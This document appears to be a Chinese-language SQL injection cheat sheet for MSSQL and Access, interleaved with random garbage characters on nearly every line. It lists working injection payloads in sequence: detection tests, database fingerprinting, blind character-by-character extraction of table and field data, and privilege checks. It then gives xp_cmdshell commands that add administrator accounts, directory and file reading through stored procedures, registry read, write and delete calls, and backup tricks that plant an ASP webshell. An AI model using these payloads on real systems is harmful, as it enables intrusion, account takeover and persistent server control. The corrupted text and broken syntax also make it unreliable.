1.判断是否有注入;and 1=1 ;and 1=2 d@J�jqE[��
2.初步判断是否是mssql ;and user>0 >S,yqKp37~
_f8Wa u# "
3.注入参数是字符'and [查询条件] and ''=' �2�c
L�Iz@
F$F,I,$ "
4.搜索时没过滤参数的'and [查询条件] and '%25'=' F�IDV5Y/f
>/9f>�d?w^
5.判断数据库系统 ,C1}�gPQ6<
TF�jb1�a,)
;and (select count(*) from sysobjects)>0 mssql |VQ17*4ff1
]�nY,%�X�E
;and (select count(*) from msysobjects)>0 access 9�@�/�X;zO
Lk9X>�`b#B
pX `BD�Yg.
U��J*� D��
6.猜数据库 ;and (select Count(*) from [数据库名])>0 Z9,-FO{#3-
a<*q+a(�*W
7.猜字段 ;and (select Count(字段名) from 数据库名)>0 $aDAD�4mmm
L3�/m}AH,�
8.猜字段中记录长度 ;and (select top 1 len(字段名) from 数据库名)>0 XE�l�-5-M"
8lk@ev=O�&
9.(1)猜字段的ascii值(access) G�H[�A�TL
�sxkW���g>
;and (select top 1 asc(mid(字段名,1,1)) from 数据库名)>0 ��&c>%E%!"
P'MfuTt�T&
(2)猜字段的ascii值(mssql) �B��|XrjI?
9��K,PT�.c
;and (select top 1 unicode(substring(字段名,1,1)) from 数据库名)>0 =z#6mSx|W
&y_Ya%Z3*e
10.测试权限结构(mssql) /�6",#B}%b
>�%LZ|*U��
"%]�<Co�<S
>�J�(�.�_K
;and 1=(select IS_SRVROLEMEMBER('sysadmin'));-- Z$�jqB~=^e
m#w1?y)Z@X
;and 1=(select IS_SRVROLEMEMBER('serveradmin'));-- *��Cf5D6=Q
Bl[���4[N�
;and 1=(select IS_SRVROLEMEMBER('setupadmin'));-- rZ`+g7&^Fh
~(��aMKB
;and 1=(select IS_SRVROLEMEMBER('securityadmin'));-- � q�HVZs�Z
u�|�(�;SY�
;and 1=(select IS_SRVROLEMEMBER('diskadmin'));-- Kcl~cIh7�7
�# `L�?24%
;and 1=(select IS_SRVROLEMEMBER('bulkadmin'));-- �PzF>�yG�[
|xYr0C�[Pq
;and 1=(select IS_MEMBER('db_owner'));-- }Um,wY[t�K
�0M�pZdJ��
�*{y({J��
zD�^*-�>`p
11.添加mssql和系统的帐户 dbga >j���
�{:�;6 *�W
;exec master.dbo.sp_addlogin username;-- R��p^f�Y�_
;exec master.dbo.sp_password null,username,password;-- At<D36,�^"
d�)>b/0CZ�
;exec master.dbo.sp_addsrvrolemember sysadmin username;-- �_p*a�`,tK
�@tT2o@2Y^
;exec master.dbo.xp_cmdshell 'net user username password ~#�MX�hhqB
)x5t'�]w`K
/workstations:*/times:all/passwordchg:yes /passwordreq:yes /active:yes /add';-- !�}l���CwV
CK�E):kHu�
;exec master.dbo.xp_cmdshell 'net user username password /add';-- j���e;C�}4
�DbWaF5\yD
;exec master.dbo.xp_cmdshell 'net localgroup administrators username /add';-- o�[^nmHrM2
PQj�'�D�<G
�/6�y9�u�}
!�P�8Y(�i
12.(1)遍历目录 3-/F]}�0y6
k'8tqIUN�]
;create table dirs(paths varchar(100), id int) icK>��| ��
�'�vwu�^u?
;insert dirs exec master.dbo.xp_dirtree 'c:\' ��eC�{St0�
vc%=V^)N7U
;and (select top 1 paths from dirs)>0 �<EKTFHJ�!
^]5^p9Jt"e
;and (select top 1 paths from dirs where paths not in('上步得到的paths'))>) �m)l'i!��Y
\/��s�0��p
`O0bba=�:=
KwHl�pW*��
(2)遍历目录 �"T@9#7Obu
8,@0~2fz#�
;create table temp(id nvarchar(255),num1 nvarchar(255),num2 nvarchar(255),num3 nvarchar(255));-- D�_q"|D$SB
;insert temp exec master.dbo.xp_availablemedia;-- 获得当前所有驱动器 7�v�&�>d�,
LzTdi%u$0|
;insert into temp(id) exec master.dbo.xp_subdirs 'c:\';-- 获得子目录列表 ]T<t�kv�cI
w�2SN=�X~#
;insert into temp(id,num1) exec master.dbo.xp_dirtree 'c:\';-- 获得所有子目录的目录树构
:�al
,zxs
g4��3(N!@g
;insert into temp(id) exec master.dbo.xp_cmdshell 'type c:\web\index.asp';-- 查看文件的内容 MW�v(/_b�
f�HODS�9HQ
e�sM r�@Oc
oFb~��|�>d
13.mssql中的存储过程 JU#m?4��g
�a>Wr2gPko
xp_regenumvalues 注册表根键, 子键 "m%EF�WUOl
;i��?rd� f
;exec xp_regenumvalues 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion\Run' 以多个记录集方式返回所有键值 pA�ws{3(Q�
9m.MGJbQ_f
xp_regread 根键,子键,键值名 _+j#�.o�>�
%'�u�ei4��
;exec xp_regread ix hF�,F��
J4x|Af�p�
'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion','CommonFilesDir' 返回制定键的值 9;�Q�|"
T
ce�[
Maw�
xp_regwrite 根键,子键, 值名, 值类型, 值 �aoQ$"P�F9
~.�>8��w�w
值类型有2种REG_SZ 表示字符型,REG_DWORD 表示整型 dT0>\9Z�Nr
�zR4]buHnE
;exec xp_regwrite 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion','TestValueName','reg_sz','hello' 写入注册表 f/Q�wXO-U�
V��r@tSc�&
xp_regdeletevalue 根键,子键,值名 0NK|�3�]p�
�*07?�U")�
exec xp_regdeletevalue 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion','TestValueName' 删除某个值 u* G+=aV.6
jgiS/o��W
xp_regdeletekey 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion\Testkey' 删除键,包括该键下所有值 O^P�N{��u�
z9!OzG�tIR
+|x{�?%�.O
Yw
y�MC��d
14.mssql的backup创建webshell mMv�A�A�;�
�/~Bs5f.]?
use model 5$$#�d�_Gj
�ar��tn �_
create table cmd(str image); yh/��JH�o;
'��N^���*,
insert into cmd(str) values (''); +$Y*1{hyOo
Xjd�HH.) S
backup database model to disk='c:\l.asp'; �eY-�h<K)y
�EDuH�+/:n
�*Vm��X�.�
N�MQG[py!f
15.mssql内置函数 U{�j4�Fl�B
Dw.I<fns^B
;and (select @@version)>0 获得Windows的版本号 Z\]{{;%4b7
A*vuS�Q�t(
;and user_name()='dbo' 判断当前系统的连接用户是不是sa 9�^9��-\DG
cly}��[<w!
;and (select user_name())>0 爆当前系统的连接用户 zV�a&4 T-
Q��wt0~9n(
;and (select db_name())>0 得到当前连接的数据库 pF7N = mO
6�)p8�BUft
^{{a
�v?h�
�"*t���0
t
16.简洁的webshell mE5{)<N:�C
1�Y���&W>p
use model E#_2�t)�20
gL-kI��*Ra
create table cmd(str image); <i4]q�O(0u
'`�|j{mBhG
insert into cmd(str) values (''); n�u7� R���
y/ Bo�4�fM
backup database model to disk='g:\wwwtest\l.asp';
